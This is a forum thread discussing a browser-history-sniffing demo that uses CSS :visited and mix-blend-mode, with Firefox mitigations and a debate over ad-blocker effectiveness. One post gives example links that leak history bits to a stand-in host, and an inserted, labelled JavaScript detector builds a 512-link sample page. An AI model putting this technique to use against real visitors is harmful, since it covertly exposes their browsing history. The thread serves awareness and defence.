Mathwiz Posted May 30, 2019

This is a couple of years old, so apologies if it's already been discussed; but I just ran across this last night. (BTW, this doesn't work in IE, or in Edge - yet - but works in Chrome, other Chromium derivatives like Opera, and FF and its derivatives.)

This demo appears at first to be a "whack-a-mole" game: you're supposed to click the "mole" as quickly as possible. But try it: when you click the "mole," it will pop up a list of these nine Web pages:

https://www.cnn.com
https://news.ycombinator.com
https://www.reddit.com
https://www.amazon.com
https://twitter.com/lcamtuf
https://www.donaldjtrump.com
https://www.farmersonly.com
https://www.diapers.com

... and will tell you which ones you've visited!

How it works: rather than being random, the mole's position depends on which combination of the above Web sites you've visited. Since there are nine Web sites, there are 2^9 or 512 possible visited/not visited combinations. So the demo actually shows 512 moles, one for each possible combination, and uses CSS "mix blend modes" to ensure only one mole is visible: the one that corresponds to your particular browsing history. Read the author's blog post for more details.

Note that although this demo uses JavaScript to reveal the results, collecting the info only required HTML, CSS, and a means to convince you to click the right spot on the page, so add-ons like NoScript won't protect you. If this were a truly deceptive web page, you could imagine revealing whether you've visited any of hundreds of Web sites by playing the "game" (or by clicking apparently-innocuous links or buttons at the deceptive Web site) for a few minutes.

Countermeasures and Mitigations

There are a couple of obvious countermeasures, but you'd have to give up some functionality. You could just disable flagging visited links: in FF, toggle layout.css.visited_links_enabled in about:config to "false." In the demo, the mole will now always appear in the "no links visited" position.

Or you could give up mix blend mode instead: again in FF, toggle layout.css.mix-blend-mode.enabled to "false." This disables the "game": the "mole" is gone, replaced with a white rectangle; but I'd wager that 99% of legit Web sites wouldn't be significantly affected. (A few might display slightly "funny" but should work OK. Besides, they'd look that way under IE/Edge anyhow, unless they have IE/Edge-specific coding, and in that case, an IE-like SSUAO is all you'd need to fix the site.)

Finally, there's a weakness in this method that makes it a bit less revealing than you might think. When I first tried it, I was surprised to learn that I hadn't visited any of the above Web sites, even though I know I at least visit amazon.com rather often. But it didn't show as "visited" because I use a bookmark to go to amazon.com, which actually goes to https://www.amazon.com/?.... Since the demo page couldn't guess the entire long string, my browser didn't show https://www.amazon.com by itself as "visited." So maybe the best mitigation is just to append a ? and some extra random garbage to all your bookmarks!
Mcinwwl Posted May 30, 2019

The problem is that this demo displays data only locally; no request is sent back. And if it was, I'd assume it could have been blocked by a specific rule in uBlock, as it is already nicely recognized as an inline script.
Mathwiz Posted May 30, 2019 (Author)

The demo is designed just to show what's possible; it's not designed to actually steal your browsing history! So of course no request is sent back.

6 hours ago, Mathwiz said:
... although this demo uses JavaScript to reveal the results, collecting the info only required HTML, CSS, and a means to convince you to click the right spot on the page, so add-ons like NoScript won't protect you.

IOW, the "moles" could've been 512 simple links, from

<a href="http://mybadsite.com?user=victim1&historyBits=000" />

... through ...

<a href="http://mybadsite.com?user=victim1&historyBits=511" />

... so when you click one, the server just collects your data and goes to the next page. And the demo runs fine with all of uBO's filters enabled. There's really nothing for uBO to block; that's what makes it potentially dangerous.
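The post above gives a blocker nothing to match on at the request level, but the page that does the sniffing still has a recognisable shape. The following is an added example, not code from the thread or from the demo's author: a static heuristic a content filter or proxy could run over fetched HTML, looking for the three ingredients the thread describes together (a :visited style rule, a mix-blend-mode declaration, and a large family of links that differ only in one numeric query parameter such as the historyBits variant). All sample HTML is constructed for the demonstration, and the function names and the threshold of 64 links are assumptions.

```javascript
// Added example (not from the thread): static indicators of a CSS :visited
// history-sniffing page, checked over raw HTML text. Heuristic only: regex scan,
// not a full HTML/CSS parser. All sample inputs below are constructed.

function extractStyleText(html) {
  // Concatenate the contents of every <style> block.
  const out = [];
  const re = /<style\b[^>]*>([\s\S]*?)<\/style>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out.join("\n");
}

function extractHrefs(html) {
  // Collect raw href values; undo the one HTML entity that matters for query strings.
  const hrefs = [];
  const re = /<a\b[^>]*\bhref\s*=\s*["']([^"']+)["']/gi;
  let m;
  while ((m = re.exec(html)) !== null) hrefs.push(m[1].replace(/&amp;/g, "&"));
  return hrefs;
}

function largestNumericLinkFamily(hrefs) {
  // Bucket links by their URL with one numeric query value masked out. A page that
  // encodes n probed sites into one parameter yields a single bucket of 2^n links.
  const families = new Map();
  for (const h of hrefs) {
    let url;
    try { url = new URL(h, "https://example.invalid/"); } catch { continue; }
    for (const [k, v] of url.searchParams) {
      if (!/^\d+$/.test(v)) continue;
      const masked = new URLSearchParams(url.searchParams);
      masked.set(k, "#");
      const key = `${url.origin}${url.pathname}?${masked.toString()}`;
      families.set(key, (families.get(key) || 0) + 1);
    }
  }
  return Math.max(0, ...families.values());
}

function assessHistorySniffRisk(html, minFamily = 64) {
  const css = extractStyleText(html);
  const hasVisitedRule = /:visited\b/i.test(css);
  const hasBlendMode = /mix-blend-mode\s*:/i.test(css);
  const largestFamily = largestNumericLinkFamily(extractHrefs(html));
  const bigFamily = largestFamily >= minFamily;
  const indicators = [];
  if (hasVisitedRule) indicators.push(":visited style rule");
  if (hasBlendMode) indicators.push("mix-blend-mode declaration");
  if (bigFamily) indicators.push(`${largestFamily} links differing only in one numeric parameter`);
  // :visited styling is the necessary ingredient; blend mode (hiding all but one
  // "mole") or the link family (encoding the answer in a click) is the second.
  const suspicious = hasVisitedRule && (hasBlendMode || bigFamily);
  return { suspicious, indicators, largestFamily };
}

// Constructed sample 1: the shape of the non-JavaScript variant from the thread
// (512 links, one per combination of nine probed sites).
function buildSniffSample(bits = 9) {
  const links = [];
  for (let i = 0; i < (1 << bits); i++) {
    links.push(`<a href="http://mybadsite.com?user=victim1&historyBits=${i}">.</a>`);
  }
  return `<html><head><style>
    a:visited { color: #fff; }
    .mole { mix-blend-mode: multiply; }
  </style></head><body>${links.join("")}</body></html>`;
}

// Constructed sample 2: an ordinary blog with purple visited links and five
// pagination links, which a naive "has :visited styling" rule would also flag.
const BENIGN_SAMPLE = `<html><head><style>a:visited { color: purple; }</style></head>
<body>${[1, 2, 3, 4, 5].map(p => `<a href="/blog?page=${p}">${p}</a>`).join(" ")}</body></html>`;

if (typeof require !== "undefined" && require.main === module) {
  console.log(assessHistorySniffRisk(buildSniffSample()));  // suspicious: true, largestFamily: 512
  console.log(assessHistorySniffRisk(BENIGN_SAMPLE));       // suspicious: false, largestFamily: 5
}
```

The benign sample shows why the link-family size matters: almost every site styles visited links, so :visited alone is not a signal, and the combination with either mix-blend-mode or a 2^n-sized family of near-identical links is what separates the demo's structure from ordinary pagination. A real deployment would also want to cover styles loaded from external stylesheets and inline style attributes, which this scan ignores.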
Mcinwwl Posted May 30, 2019

Except for a specific domain and a specific GET request to this domain? uBO blocks nothing because why should it block a test site.
Mathwiz Posted May 31, 2019 (Author)

Well, at the end of the day, all I can do is let folks know a potential security exposure exists. I can't make anyone understand it, or take it seriously....
Mcinwwl Posted May 31, 2019

Sure, no harm's done. The only problem I see is that in the spying advertising industry, changes are quick. If this technique has great potential, it would have been already used by tech companies to track users, and if this was true, tracker-blockers would have already prepared for an update. After all, worth knowing, but no reason to panic.
404notfound Posted June 4, 2019

Haha, so my setting of keeping no history in the browser is of use after all!